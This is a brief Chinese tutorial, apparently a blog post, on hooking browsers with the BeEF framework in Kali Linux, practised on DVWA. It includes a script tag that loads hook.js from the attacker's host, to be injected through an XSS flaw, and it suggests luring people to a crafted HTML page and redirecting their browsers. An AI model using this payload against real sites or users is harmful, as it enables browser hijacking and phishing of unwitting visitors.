beef简单的使用

打开kali图形界面，点击beef start开启beef

可能自动弹出beef界面，如果没有弹出，可以在浏览器内输入命令行界面的URL访问，在beef登录界面输入beef的默认用户名和密码：beef/beef登录beef界面，

登录后，将<script src='http://IP（运行beef主机的IP）:3000/hook.js'></script>插入存在xss漏洞的表单中，本人选取了DVWA的普通难度的XSS漏洞处

之后beef界面就会出现浏览信息部分，显示访问者的IP，由于是本机访问的虚拟机，显示的是网关的IP

 

还可以直接构造一个html脚本，诱使人点即进入，脚本内容如下

可以达到同样的效果，

 

可以根据需求将页面跳转到其他网址，也可以根据需求，用beef将网址自动跳转到指定的URL